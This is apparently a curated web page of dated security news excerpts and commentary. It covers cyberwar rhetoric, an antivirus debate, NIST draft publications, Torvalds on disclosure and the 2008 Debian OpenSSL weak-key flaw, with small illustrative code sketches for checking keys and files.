We have a variety of institutions that can defend us when attacked: the police, the military, the Department of Homeland Security, various commercial products and services, and our own personal or corporate lawyers. The legal framework for any particular attack depends on two things: the attacker and the motive. Those are precisely the two things you don't know when you're being attacked on the Internet. We saw this on July 4 last year, when U.S. and South Korean websites were attacked by unknown perpetrators from North Korea -- or perhaps England. Or was it Florida?

We surely need to improve our cybersecurity. But words have meaning, and metaphors matter. There's a power struggle going on for control of our nation's cybersecurity strategy, and the NSA and DoD are winning. If we frame the debate in terms of war, if we accept the military's expansive cyberspace definition of "war," we feed our fears.

We reinforce the notion that we're helpless -- what person or organization can defend itself in a war? -- and others need to protect us. We invite the military to take over security, and to ignore the limits on power that often get jettisoned during wartime.

If, on the other hand, we use the more measured language of cybercrime, we change the debate. Crime fighting requires both resolve and resources, but it's done within the context of normal life. We willingly give our police extraordinary powers of investigation and arrest, but we temper these powers with a judicial system and legal protections for citizens.

We need to be prepared for war, and a Cyber Command is just as vital as an Army or a Strategic Air Command. And because kid hackers and cyber-warriors use the same tactics, the defenses we build against crime and espionage will also protect us from more concerted attacks. But we're not fighting a cyberwar now, and the risks of a cyberwar are no greater than the risks of a ground invasion. We need peacetime cyber-security, administered within the myriad structure of public and private security institutions we already have.

The opinions expressed in this commentary are solely those of Bruce Schneier.

[Apr 14, 2009] Security Software: Protection or Extortion? by Rick Broida and Robert Vamosi

April 13, 2009 | PC World

As the Conficker worm sprang to life on April 1, talk here at the PC World offices turned to some interesting debates about how best to protect PCs from malware threats. In recent weeks we've run several helpful articles offering tips, tricks, and insights to keep you and your PC safe from Conficker and other malware on the Internet. At the same time, a few among us have revealed that they don't run any security software at all on their own machines--and have no intention of starting now.

Shocking as it may sound, there are plenty of experienced, knowledgeable technophiles out there who laugh in the face of danger as they traipse unprotected through the wilds of the online world. Among them is our own Hassle-Free PC blogger Rick Broida, who prefers what he deems the relatively minor threat of malware to the annoyance of intrusive, nagging security apps.

Is he insane? Naïve? To find out, we gave Rick a podium to speak on behalf of those who shrug off the safety of antimalware suites, and to defend his point of view in a debate with security correspondent Robert Vamosi, who regularly reports on malware and other security threats for PC World's Business Center. Who's right? Who's nuts? You be the judge. Share your view in our comments section.

First up, Rick Broida presents his assertion that security suites are an unnecessary nuisance compared with the threat of malware.

Rick Broida: We Don't Need No Stinking Security Software

Security software is a scam. A rip-off. A waste of money, a pain in the neck, and a surefire way to bring even the speediest PC to a crawl. Half the time it seems to cause more problems than it solves. Oh, and one more thing: It's unnecessary.

Heresy? Crazy talk? Recipe for disaster? No, no, and no. For the past several years, I've run Windows (first XP, and now Vista) without a single byte of third-party security software. No ZoneAlarm. No Norton Internet Security. No Spyware Doctor. Not even freebie favorite Avast Home Edition. I use nothing but the tools built into Windows and a few tricks I've learned.

Want to know how much time I've spent cleaning up after viruses, spyware, rootkits, Trojan horses, keyloggers, and other security breaches? None. I'll say that again: none.

Maybe I'm asking for trouble (that sound you hear is fellow PC World columnist Rob Vamosi nodding furiously), but after years of infection-free computing, I have no qualms about my methods. Your mileage may vary, and I make no guarantees. But if you want to rid your system of pricey, performance-choking security software, read on.

My first line of defense is my router. Like most, it has a built-in firewall that blocks all unauthorized traffic and makes my network more or less invisible to the outside world. The second line of defense is Windows. XP, Vista, and 7 have built-in firewalls that help protect against "inside" attacks, such as if a friend were to come over with his spyware-infected laptop and connect to my network.

Of course, a router can't stop viruses, phishing, and other threats that arrive via e-mail. My secret weapon: Gmail. As I noted in "Use Gmail to Fight Spam," I route mail from my personal domain to my Gmail account. (From there, I can access messages on the Web or pull them down via Outlook.) Gmail does a phenomenal job filtering spam--much of which is malware. The service also performs a virus scan on all attachments.

By using Gmail as an intermediary between my POP3 server and my PC, I've kept not only spam at bay, but malware as well. I don't know whether Windows Live Mail and Yahoo Mail offer similar amenities, but for me Gmail is a slam-dunk solution. Even phishing messages are few and far between. Of course, as an educated user, I know better than to click a link in a message filled with scary come-ons ("Your account has been compromised!").

Speaking of phishing, the latest versions of Firefox and Internet Explorer offer robust antiphishing tools. Both will sound the alarm if I attempt to visit sites known to be fraudulent, meaning that even if I click something that looks like, say, a totally legit PayPal or eBay link, I'll get fair warning. And that's just the tip of the safe-browser iceberg: Firefox and IE are way more secure than in the old days. They block pop-ups, provide Web site ID checks, protect against malware installation, and so on.

As for other threats, I'm comfortable leaving my PC in the capable hands of Windows Defender. Microsoft's antispyware tool runs quietly and efficiently in the background. I "check in" once in a while to make sure it's active and up-to-date, but otherwise I never hear a peep from it.

Of course, that could mean bad stuff is slipping past Defender, right? Sure, it's possible. That's why I occasionally run a system scan using Ad-Aware or Malwarebytes Anti-Malware. (I'm not completely insane, after all.) So far, so good: The scans always come up empty.

Last but not least, I exercise common sense. I don't open e-mail attachments from people I don't know. I don't download files from disreputable or unknown sources. I don't visit Web sites that peddle gambling, porn, torrents, or "warez." (Yeah, I know, I'm boring.) In other words, I keep my Internet nose clean, which in turn keeps my PC clean.

At the same time, I make sure that automatic updates are turned on for Windows, my Web browsers, and any other software that gets patched regularly. And, perhaps most important of all, I rely on multiple backup methods just in case my system really is compromised somehow. For example, my Firefox bookmarks are all synced to the Web via Xmarks (formerly Foxmarks). I use the online-backup service Mozy to archive my critical documents and Outlook PST file. And drive-cloning utility Casper makes a weekly copy of my entire hard drive to a second drive.

Ladies and gentlemen of the security-software jury, I rest my case. My only real evidence is Exhibit A: me. After several years with XP and about six months with Vista, I'm still cruising along without a security care in the world. So, are you going to lock me up or accept me as your new messiah? Either way, I'm good.

Next up, security correspondent Robert Vamosi argues the opposing view.

[Feb 27, 2009] NIST Computer Security Division released two draft publications (a Special Publication and a NIST Interagency Report) today, plus one mark-up copy of a draft SP:

1. Mark-up copy of Draft Special Publication (SP) 800-53 Revision 3

2. Draft Special Publication 800-81 Revision 1

3. Draft NIST Interagency Report (IR) 7517

1. Draft SP 800-53 Rev. 3: Recommended Security Controls for Federal Information Systems and Organizations

The following document provides a line-by-line (mark-up copy) comparison between SP 800-53, Revision 2 and Draft SP 800-53, Revision 3. It should also be noted that the section of the publication addressing scoping considerations for scalability was inadvertently omitted from the public draft and will be reinstated in the final publication.

URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-53_Rev3

******

2. Draft SP 800-81 Rev. 1: Secure Domain Name System (DNS) Deployment Guide

NIST has drafted a new version of the document "Secure Domain Name System (DNS) Deployment Guide (SP 800-81)". This document, after a review and comment cycle, will be published as NIST SP 800-81r1. There will be two rounds of public comments, and this is our posting for the first one. Federal agencies, private organizations, and individuals are invited to review the draft Guidelines and submit comments to NIST by sending them to SecureDNS@nist.gov before March 31, 2009. Comments will be reviewed and posted on the CSRC website.

All comments will be analyzed, consolidated, and used in revising the draft Guidelines before final publication.

Reviewers of the draft revised Guidelines should note the following differences and additions:

(1) Updated recommendations for all cryptographic operations relating to digital signing of DNS records, verification of the signatures, Zone Transfers, Dynamic Updates, Key Management, and Authenticated Denial of Existence.

(2) The additional IETF RFC documents that have formed the basis for the updated recommendations include: DNSSEC Operational Practices (RFC 4641), Automated Updates for DNS Security (DNSSEC) Trust Anchors (RFC 5011), DNS Security (DNSSEC) Hashed Authenticated Denial of Existence (RFC 5155), and HMAC SHA TSIG Algorithm Identifiers (RFC 4635).

(3) The FIPS standards and NIST guidelines incorporated into the updated recommendations include: The Keyed-Hash Message Authentication Code (HMAC) (FIPS 198-1), Digital Signature Standard (FIPS 186-3) and Recommendations for Key Management (SP 800-57P1 & SP 800-57P3).

(4) Illustrations of secure configuration examples using the NSD DNS software, in addition to BIND.

URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-81-rev1

[Feb 17, 2009] SP 800-53, Revision 3 DRAFT Recommended Security Controls for Federal Information Systems and Organizations

NIST announces the release of the Initial Public Draft (IPD) of Special Publication 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations. This is the first major update of Special Publication 800-53 since its initial publication in December 2005. We have received excellent feedback from our customers during the past three years and have taken this opportunity to provide significant improvements to the security control catalog. In addition, the changing threat environment and growing sophistication of cyber attacks necessitated specific changes to the allocation of security controls and control enhancements in the low-impact, moderate-impact, and high-impact baselines. We also continue to work closely with the Department of Defense and the Office of the Director of National Intelligence under the auspices of the Committee on National Security Systems on the harmonization of security control specifications across the federal government. And lastly, we have added new security controls to address organization-wide security programs and introduced the concept of a security program plan to capture security program management requirements for organizations. The privacy-related material, originally scheduled to be included in Special Publication 800-53, Revision 3, will undergo a separate public review process in the near future and be incorporated into this publication, when completed. Comments will be accepted until March 27, 2009. Comments should be forwarded via email to sec-cert@nist.gov.

Draft-SP800-53 Rev.3.pdf (2,112 KB)

Cisco study: IT security policies unfair, by Jim Duffy (Network World)

A better term for an "unfair security policy" would be "bureaucratic perversion". The level of detachment from reality is what really matters here, and it can vary from "no clue" to "parallel universe". But the key element is "do no harm". That's why extremely unfair security policies are often called administrative fascism.

Unfair policies prompt most employees to break company IT security rules, and that could lead to lost customer data, a Cisco study found.

Cisco this week released a second set of findings from a global study on data leakage. The first part dealt with common employee data leakage risks and the potential impact on the collaborative workforce.

Part two deals with the ‘whys’ of behavior that raises the risk of corporate data leakage. More than half of the employees surveyed admitted that they do not always adhere to corporate security policies.

And when they don’t, it can lead to leakage of sensitive data. Of the IT respondents who dealt with employee policy violations, one in five reported that incidents resulted in lost customer data, according to the Cisco study.

The surveys covered more than 2,000 employees and IT professionals in 10 countries: the United States, the United Kingdom, France, Germany, Italy, Japan, China, India, Australia and Brazil. They were conducted by InsightExpress, a U.S.-based market research firm, and commissioned by Cisco.

The study found that the majority of employees believe their companies’ IT security policies are unfair. Indeed, surveyed employees said the top reason for non-compliance is the belief that policies do not align with the reality of what they need to do their jobs, according to Cisco.

The study found that the majority of employees in eight of 10 countries felt their company’s policies were unfair. Only employees in Germany and the United States did not agree.

In Germany, even though the majority of employees felt their companies’ policies were fair, more than half of them said they would break rules to complete their jobs, the study found. Of all the countries, France (84%) has the most employees who admitted defying policies, whether rarely or routinely.

In India, one in 10 employees admitted never or hardly ever abiding by corporate security policies. Overall, the study found that 77% of companies had security policies in place.

But defiance may not be intentional. IT and employees have a disconnect when it comes to policy and adherence awareness, the study found.

IT believes employees defy policies for a variety of reasons, from failing to grasp the magnitude of security risks to apathy; employees say they break them because they do not align with the ability to do their jobs.

But IT could do a better job communicating those policies. The study found that, depending on the country, the number of IT professionals who knew a policy existed was 20% to 30% higher than the number of employees.

Torvalds: Fed up with the security circus, by Ellen Messmer

"A lot of activity [in various security camps] stems from public-relations posturing." "What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.

Creator of the Linux kernel explains why he finds security people to be so anathema.

Aug 14, 2008 | Network World

Linus Torvalds, creator of the Linux kernel, says he's fed up with what he sees as a "security circus" surrounding software vulnerabilities and how they're hyped by security people.

Torvalds explained his position in an e-mail exchange with Network World this week. He also expanded on critical comments he made last month that caused a stir in the IT industry.

Last month Torvalds stated in an online posting that "one reason I refuse to bother with the whole security circus is that I think it glorifies -- and thus encourages -- the wrong behavior. It makes 'heroes' out of security people, as if the people who don't just fix normal bugs aren't as important. In fact, all the boring normal bugs are way more important, just because there's a lot more of them."

Never one to mince words, Torvalds also lobbed a verbal charge at the OpenBSD community: "I think the OpenBSD crowd is a bunch of masturbating monkeys, in that they make such a big deal about concentrating on security to the point where they pretty much admit that nothing else matters to them."

This week Torvalds -- who says the only person involved in the OpenBSD community with whom he talked to about the "monkeys" barb found it funny -- acknowledges others probably found it offensive.

Via e-mail, he also explains why he finds security people to be so anathema.

Too often, so-called "security" is split into two camps: one that believes in nondisclosure of problems by hiding knowledge until a bug is fixed, and one that "revels in exposing vendor security holes because they see that as just another proof that the vendors are corrupt and crap, which admittedly mostly are," Torvalds states.

Torvalds went on to say he views both camps as "crazy."

"Both camps are whoring themselves out for their own reasons, and both camps point fingers at each other as a way to cement their own reason for existence," Torvalds asserts. He says a lot of activity in both camps stems from public-relations posturing.

He says neither camp is absolutely right in any event, and that a middle course, based on fixing things as early as possible without a lot of hype, is preferable.

"You need to fix things early, and that requires a certain level of disclosure for the developers," Torvalds states, adding, "You also don't need to make a big production out of it."

Torvalds also says he doesn't care for labeling updates and changes to Linux as a security fix in a security advisory.

"What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.

It's better to avoid sticking solely to either "full and immediate disclosure" or ignoring bugs that might embarrass vendors, he points out. "Any situation that allows the vendor to sit on the bug for weeks or months is unacceptable, as is any situation that makes it harder for people who find problems to talk to technical people."

Torvalds says he's skeptical about the value of synchronized releases among vendors that favor the idea of an embargo of software vulnerability information until a fix from a vendor is ready.

That process discourages thinking about design changes to make it harder to have security bugs, Torvalds says. "So, the whole 'embargoes are good' mentality is just corruption from the vendors," he states. "But on the other hand, disclosure should not be the goal."

"I don’t believe in either camp," Torvalds concludes. What he does favor is to "have a model where security is easier to do in the first place -- that is, the Unix model -- but make it easy for people to report bugs with no embargo, but privately."

He says the Linux kernel security list "is private" in the sense that "we don't need to leak things out further" to get some software issue fixed. He says the process allows, though doesn't encourage, a five-day embargo, and "even then, I will forward it to technical people on an 'as needed' basis, because even that embargo secrecy is not some insane absolute thing."

Comments

Some people... By Anonymous on August 17, 2008, 2:31 pm

I can't believe the genius behind Linux referred to proactively fixing all bugs, regardless of security implications, as "masturbating," since that's quite obviously...

[May 16, 2008] Linux gets security black eye

May 16, 2008

As has been widely reported, the maintainers of Debian's OpenSSL packages made some errors recently that have potentially compromised the security of any sshd-equipped system used remotely by Debian users. System administrators may wish to purge authorized_key files of public keys generated since 2006 by affected client machines.

Simply using a Debian-based machine to access a remote server via SSH would not be enough to put the machine at risk. However, if the user copied a public key generated on a Debian-based system to the remote server, for example to take advantage of the higher security offered by password-free logins, then the weak key could make the server susceptible to brute-force attacks, especially if the user's name is easily guessable.

Administrators of servers that run SSH may wish to go through users' authorized key files (typically ~/.ssh/authorized_keys), deleting any that may have been affected. A "detector" script, available here, appears to compare public key signatures against a list of just 262,800 entries. That in turn suggests that if the user's name is known, a brute force attack progressing at one guess per second could succeed within 73 hours (262,800 seconds).
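The arithmetic behind that estimate, and the detector's core operation (a simple membership test against the known-weak list), can be sketched as follows. The fingerprint strings below are made-up placeholders, not real weak-key signatures:

```python
# Worst-case time to brute-force a login when the effective key space
# collapses to the published blocklist of known-weak keys.
KNOWN_WEAK_KEYS = 262_800      # entries in the detector's list
GUESSES_PER_SECOND = 1         # the rate assumed in the article

worst_case_hours = KNOWN_WEAK_KEYS / GUESSES_PER_SECOND / 3600
print(f"worst case: {worst_case_hours:.0f} hours")  # prints "worst case: 73 hours"

# The detector itself reduces to set membership: a key is flagged if its
# signature appears in the list of known-weak keys.
weak_fingerprints = {"aa:bb:cc:placeholder", "dd:ee:ff:placeholder"}

def is_compromised(fingerprint: str) -> bool:
    # Flag any key whose fingerprint is on the known-weak list.
    return fingerprint in weak_fingerprints

print(is_compromised("aa:bb:cc:placeholder"))  # True
```

The point of the arithmetic is that 262,800 candidates is a trivially small search space; real attacks would of course run far faster than one guess per second.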

A full explanation of the problem can be found here. In a nutshell, Debian's OpenSSL maintainers made some Debian-specific patches that, according to subscriber-only content at LWN.net, were aimed at fixing a memory-mapping error that surfaced during testing with the valgrind utility. The unintended consequence was a crippling of the randomness of keys, making them predictable and thus possible to guess using "brute-force" attacks. Unfortunately, the Debian maintainers failed to submit their patches upstream, so the problem did not surface until very recently (there's certainly a lesson to be learned there). Not surprisingly, brute-force attacks are way up this week, LWN.net also reported.

Users of Debian and Debian-based distributions such as Ubuntu should immediately upgrade the SSH software on their systems. The new openssh-client package contains an "ssh-vulnkey" utility that, when run, checks the user's keys for the problem. Users should regenerate any affected keys as soon as possible.

Also possibly affected are "OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections," though apparently not keys generated with GnuPG or GnuTLS. More details can be found here (Debian resource page), as well as on this webpage, which also links to lists of common keys and brute-force scripts that boast of 20-minute typical break-in times.

-- Henry Kingman

[May 16, 2008] Practical Technology » Open-Source Security Idiots

The key mechanism is really alarming.
Sometimes, people do such stupid things that words almost fail me. That’s the case with a Debian ‘improvement’ to OpenSSL that rendered this network security program next to useless in Debian, Ubuntu and other related Linux distributions.

OpenSSL is used to enable SSL (Secure Socket Layer) and TLS (Transport Layer Security) in Linux, Unix, Windows and many other operating systems. It also includes a general purpose cryptography library. OpenSSL is used not only in operating systems, but in numerous vital applications such as security for Apache Web servers, OpenVPN for virtual private networks, and in security appliances from companies like Check Point and Cisco.

Get the picture? OpenSSL isn’t just important, it’s vital, in network security. It’s quite possible that you’re running OpenSSL even if you don’t have a single Linux server within a mile of your company. It’s that widely used.

Now, OpenSSL itself is still fine. What’s anything but fine is any Linux, or Linux-powered device, that’s based on Debian Linux OpenSSL code from September 17th, 2006 until May 13, 2008.

What happened? This is where the idiot part comes in. Some so-called Debian developer decided to ‘fix’ OpenSSL because it was causing the Valgrind code analysis tool and IBM’s Rational Purify runtime debugging tool to produce warnings about uninitialized data in any code that was linked to OpenSSL. This ‘problem’ and its fix have been known for years. That didn’t stop our moronic developer from fixing it on his own by removing the code that enabled OpenSSL to generate truly random numbers.

After this ‘fix,’ OpenSSL on Debian systems could only seed its PRNG (Pseudo-Random Number Generator) with a value from 1 to 32,768: the number of possible Linux process identification numbers. For cryptographic purposes, a range of numbers like that is a bad joke. Anyone who knows anything about cracking can work up a routine to automatically bust it within a few hours.
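To see why, here is a minimal illustrative sketch (ordinary Python standing in for the broken OpenSSL code, not the actual patch): when the process ID is the only entropy source, an attacker can simply enumerate every keystream any affected machine could ever produce.

```python
import random

PID_MAX = 32768  # default upper bound on Linux process IDs

def broken_keystream(pid: int, nbytes: int = 8) -> bytes:
    # Stand-in for the crippled PRNG: the process ID is the only entropy,
    # so the output is fully determined by the PID.
    rng = random.Random(pid)
    return bytes(rng.randrange(256) for _ in range(nbytes))

# Enumerate every "random" keystream an affected system could produce.
all_streams = {broken_keystream(pid) for pid in range(1, PID_MAX + 1)}
print(len(all_streams))  # at most 32,768 distinct values, world-wide
```

With at most 32,768 possibilities, precomputing every weak key is a matter of minutes, which is exactly what the published attack lists did.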

Why didn’t the OpenSSL team catch this problem? They never saw it: Debian developers have this cute habit of keeping their changes to themselves rather than passing them upstream to a program’s actual maintainers. Essentially, what Debian ends up doing is forking programs. There’s the Debian version and then there’s the real version.

Usually, it’s a difference that makes no difference. Sometimes, it just shows how pig-headed Debian developers can be. My favorite case is when, rather than let Mozilla keep control of the Firefox logo (which wasn’t open enough according to the Debian Social Contract), they forked Firefox into their own version: Iceweasel.

That was just stupid. This is stupid and it’s put untold numbers of users at risk for security attacks.

First, the mistake itself was something that only a programming newbie would have made, and I have no idea how it ever got past the Debian code maintainers. This is a first-year programming assignment: “What is a random number generator and how do you make one?”

Then, to add insult to injury, because Debian never passed its ‘fix’ on to OpenSSL (the people who would have caught the problem at a glance), this sloppy, insecure mess has now been used on hundreds of thousands, if not millions, of servers, PCs, and appliances.

This isn’t just bad. This is Microsoft security bad.

Now, there’s a fix for Debian 4.0 Etch and its development builds. Ubuntu, which is based on Debian, also has fixes for it. In Ubuntu, the versions that need patches are Ubuntu 7.04, Feisty; Ubuntu 7.10, Gutsy; the just-released Ubuntu 8.04 LTS, Hardy; and the developer builds of Ubuntu Intrepid Ibex.

Debian has also opened a site on how to roll over your insecure keys to new ones once you’ve installed the corrected software. For more on how to fix your system, see Fixing Debian OpenSSL on my ComputerWorld blog, Cyber Cynic.

[May 14, 2008] Securing the net-the fruits of incompetence

[May 8, 2008] National Checklist Program Repository

30814 CVE Vulnerabilities
160 Checklists
141 US-CERT Alerts
2192 US-CERT Vuln Notes
3259 OVAL Queries

[May 8, 2008] CWE - Common Weakness Enumeration

[May 8, 2008] http://csrc.nist.gov/publications/PubsDrafts.html#800-123

Reasonably well-written draft with good structure, but uneven coverage of topics: weak on section 6.4.1, vulnerability scanning, where the question of false positives is swept under the carpet. Good list of additional documents on page D2.

Draft SP 800-123, Guide to General Server Security, is available for public comment.

This document is intended to assist organizations in installing, configuring, and maintaining secure servers. SP 800-123 makes recommendations for securing a server's operating system and server software, as well as maintaining the server's secure configuration through application of appropriate patches and upgrades, security testing, log monitoring, and backups of data and operating system files.

The document addresses common servers that use general operating systems and are deployed in both outward-facing and inward-facing locations.

Comments need to be received by June 13, 2008.

[Apr 23, 2008] Semantic Gap

Posted by kdawson on Wednesday April 23, @08:03AM
from the stand-and-identify dept. captcha_fun writes

"Researchers at Penn State have developed a patent-pending image-based CAPTCHA technology for next-generation computer authentication. A user is asked to pass two tests: (1) click the geometric center of an image within a composite image, and (2) annotate an image using a word selected from a list. These images shown to the users have fake colors, textures, and edges, based on a sequence of randomly-generated parameters. Computer vision and recognition algorithms, such as alipr, rely on original colors, textures, and shapes in order to interpret the semantic content of an image. Because of the endowed power of imagination, even without the correct color, texture, and shape information, humans can still pass the tests with ease. Until computers can 'imagine' what is missing from an image, robotic programs will be unable to pass these tests. The system is called IMAGINATION and you can try it out."

This sounds promising given how broken current CAPTCHA technology is.

[Dec 28, 2007] http://csrc.nist.gov/publications/PubsSPs.html#800-53_Rev2

December 28, 2007 | NIST

NIST announces the release of Special Publication 800-53, Revision 2, Recommended Security Controls for Federal Information Systems. This special update incorporates guidance on appropriate safeguards and countermeasures for federal industrial control systems.

NIST’s Computer Security Division (Information Technology Laboratory) and Intelligent Systems Division (Manufacturing Engineering Laboratory), in collaboration with the Department of Homeland Security and organizations within the federal government that own, operate, and maintain industrial control systems, developed the necessary industrial control system augmentations and interpretations for the security controls, control enhancements, and supplemental guidance in Special Publication 800-53.

The industrial control system augmentations and interpretations for Special Publication 800-53 will facilitate the employment of appropriate safeguards and countermeasures for these specialized information systems that are part of the critical infrastructure of the United States.

The changes to Special Publication 800-53, Revision 1 in updating to Revision 2, include:

The regular two-year update to Special Publication 800-53 will occur, as previously scheduled, in December 2008.

[Nov 14, 2006] Configuring Java Applications to Use Solaris Security.

[Nov 14, 2006] Draft SP 800-115, Technical Guide to Information Security Testing.

Draft SP 800-115, Technical Guide to Information Security Testing, is available for public comment. It seeks to assist organizations in planning and conducting technical information security testing, analyzing findings, and developing mitigation strategies. The publication provides practical recommendations for designing, implementing, and maintaining technical information security testing processes and procedures. SP 800-115 provides an overview of key elements of security testing, with an emphasis on technical testing techniques, the benefits and limitations of each technique, and recommendations for their use. Draft SP 800-115 is intended to replace SP 800-42, Guideline on Network Security Testing, which was released in 2003. Please visit the drafts page to learn how to submit comments to this draft document.

[Nov 01, 2006] Hillary Clinton's private server was open to 'low-skilled-hackers'

[Nov 1, 2006] Operational Security Capabilities for IP Network Infrastructure (opsec) Charter

[May 4, 2006] Draft Special Publication 800-80, Guide for Developing Performance Metrics for Information Security

Adobe PDF (762 KB)

NIST's Computer Security Division has completed the initial public draft of Special Publication 800-80, Guide for Developing Performance Metrics for Information Security.

This guide is intended to assist organizations in developing metrics for an information security program. The methodology links information security program performance to agency performance. It leverages agency-level strategic planning processes and uses security controls from NIST SP 800-53, Recommended Security Controls for Federal Information Systems, to characterize security performance. To facilitate the development and implementation of information security performance metrics, the guide provides templates, including at least one candidate metric for each of the security control families described in NIST SP 800-53.

[Aug 15, 2005] Draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form

Adobe pdf (1,153 KB)

The NIST Computer Security Division is pleased to announce for your review and comment draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form. This draft document brings the assessment process up to date with key standards and guidelines developed by NIST.
Please provide comments by October 17, 2005 to sec-report@nist.gov. Comment period has been closed.

[Sept 11, 2004] http://secinf.net/unix_security/

A useful list of security papers, tutorials and FAQs. Looks like it was created in 2002 and never updated since.

Computer Security: Art and Science, by Matt Bishop (University of California, Davis). Addison Wesley, published 12/02/2002. ISBN 0-201-44099-7. Cloth; 1136 pp. US: $74.99

An expensive and dull book that can be used for torturing CS students :-). An attempt at broad coverage that might well kill any interest in computer security for most students...


eSecurity Planet: Trends: Updated Open Source Security Testing Manual Available

... Updated Open Source Security Testing Manual Available. By Paul Desmond. Version 2 of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

The sky is not falling By Dev Zaborav

Recently, notifications started going out regarding a number of critical vulnerabilities in BIND, the software that powers the majority of the name servers on the Internet. In an attempt to convey the importance of these holes, many computer security experts were referring to this as the next major Internet bug -- drawing near-panicked comparisons to the massive, widespread BIND attacks of 1998. Many even went to the point of proclaiming that this incident will be the next great Internet-crippling bug.

To an extent, the concern over the announcement of the BIND vulnerabilities is valid. The Internet works as we know it because when we type a site into our browsers or email clients, name servers translate that site's name into numbers that can be routed. Without functioning name servers, the Internet becomes a much different world. Imagine having to identify friends by their telephone numbers rather than by their names. The vulnerabilities that were released at the end of January could allow attackers to take down or take control of the majority of name servers on the Internet. It was imperative that server administrators be notified as soon as possible and alerted as to the crucial nature of this problem. They were notified promptly.

However, by the time the advisories reached many security experts and members of the press, the discussions had taken on a tone of hysteria. Before the advisory was made public, the root name servers -- those that disseminate name information to the rest of the Internet's name servers -- had already been patched. It remains for system administrators on the rest of the Internet to upgrade their servers ... and many large providers and corporations reacted quickly and appropriately. At this point, the majority of Internet backbone providers have upgraded their servers.

The possibility that these vulnerabilities will take down the entire Internet is an unlikely one at best. To prove how drastic a bug this is, many experts pointed to the 1998 BIND hole, which was indeed one of the most persistently exploited vulnerabilities on the Net for a long, long time. What the experts fail to mention, however, is that at the time, the Red Hat distribution of Linux set up BIND without prompting at installation. Many Linux users didn't know they were running BIND, so they didn't think they needed to apply the patch when it became available. It's no longer the case that Red Hat installs BIND automatically; there will be fewer servers running BIND unnecessarily or unknowingly, so this vulnerability will be less prevalent. Despite their widespread effect, the great BIND attacks of 1998 didn't cause the Internet to shut down. The Internet continued along just fine, except for a few hundred compromised servers and defaced Web pages, which hardly affect the functionality of the Internet as a whole.

Another incident that experts and journalists have used to display how overwhelming this set of vulnerabilities could be occurred in late January when Microsoft's Web pages were unavailable for several hours due to a DNS problem (http://abcnews.go.com/sections/scitech/DailyNews/microsoft010125.html). While it's true that this is an example of a Website being inaccessible due to a problem with name servers, the instance is otherwise unrelated to the BIND problem. Microsoft's name servers don't run BIND, and by all indications the troubles they suffered two weeks ago were in no way similar to those caused by the holes in BIND. The constant comparison, clearly intended to heighten concern about the destruction of the entire Internet if name servers go down, smacks of sensationalism.
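In the spirit of the article's point about servers running BIND unknowingly, a quick hypothetical check (assuming the procps pgrep tool is available) for whether a box is running a name server at all:

```shell
#!/bin/sh
# Report whether a BIND daemon (named) is currently running on this host.
if pgrep -x named >/dev/null 2>&1; then
    status="running"
else
    status="not running"
fi
echo "named is $status"
```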

developerWorks/Linux Security: Improving the security of open UNIX platforms -- a simple MD5-checking shell script (bash) by Igor Maximov (uniug@cris.net). Nothing special.
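A minimal sketch of the same idea (not Maximov's actual script; assumes GNU coreutils md5sum): snapshot baseline checksums, then verify them later so any modified file is flagged.

```shell
#!/bin/sh
# Snapshot-and-verify integrity check built on md5sum.
workdir=$(mktemp -d) || exit 1
echo "alpha" > "$workdir/a.conf"
echo "beta"  > "$workdir/b.conf"

# record the baseline checksums
( cd "$workdir" && md5sum ./*.conf > baseline.md5 )

# verification succeeds while nothing has changed...
( cd "$workdir" && md5sum -c --quiet baseline.md5 >/dev/null 2>&1 ); before=$?

# ...and fails once a file is tampered with
echo "tampered" >> "$workdir/a.conf"
( cd "$workdir" && md5sum -c --quiet baseline.md5 >/dev/null 2>&1 ); after=$?

echo "exit codes: before=$before after=$after"
rm -rf "$workdir"
```

In a real deployment the baseline would live on read-only media, since an intruder who can rewrite the checksum file defeats the check.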

[Dec 28, 2000] NSA Security-Enhanced Linux

Security-Enhanced Linux has a well-defined architecture (named Flask) for flexible mandatory access controls that has been experimentally validated through several prototype systems (DTMach, DTOS, and Flask). The architecture provides clean separation of policy from enforcement, well-defined policy decision interfaces, flexibility in labeling and access decisions, support for policy changes, and fine-grained controls over the kernel abstractions. Detailed studies have been performed of the ability of the architecture to support a wide variety of security policies and are available on the DTOS and Flask web pages accessible via the Background page (http://www.nsa.gov/selinux/background.html). A published paper about the Flask architecture is also available on the Background page. The architecture and its implementation in Linux are described in detail in the documentation (http://www.nsa.gov/selinux/docs.html). RSBAC appears to have similar goals to the Security-Enhanced Linux. Like the Security-Enhanced Linux, it separates policy from enforcement and supports a variety of security policies. RSBAC uses a different architecture (the Generalized Framework for Access Control or GFAC) than the Security-Enhanced Linux, although the Flask paper notes that at the highest level of abstraction, the Flask architecture is consistent with the GFAC. However, the GFAC does not seem to fully address the issue of policy changes and revocation, as discussed in the Flask paper. RSBAC also differs in the specifics of its policy interfaces and its controls, but a careful evaluation of the significance of these differences has not been performed.

SecurityPortal - Ask Buffy Apache Security

I am trying to implement security on the Apache Server 1.3.12 running on a Linux Red Hat 6.2. Are there any good docs or how-tos on this subject?

Aejaz Sheriff

Very few security problems exist with the Apache server itself. Having said that, however, I suggest that you upgrade to Apache 1.3.14, which solves some security issues. For online documentation of the Apache server the following URLs are excellent:

http://httpd.apache.org/docs/misc/security_tips.html
http://httpd.apache.org/docs/

The majority of Web-based security problems come from poorly written CGI programs, online databases, and the like. Razvan Peteanu has written the following article:

http://securityportal.com/cover/coverstory20001030.html - Best Practices for Secure Web Development

And I highly recommend reading it.

Buffy (buffy@securityportal.com)

Who should own Apache? I have nobody as the owner and the group, but I'm not sure if this is safe or not.

Brad

The usual default for "owning" Apache is user and group root:

-rwxr-xr-x    1 root     root       301820 Aug 23 13:45 /usr/sbin/httpd

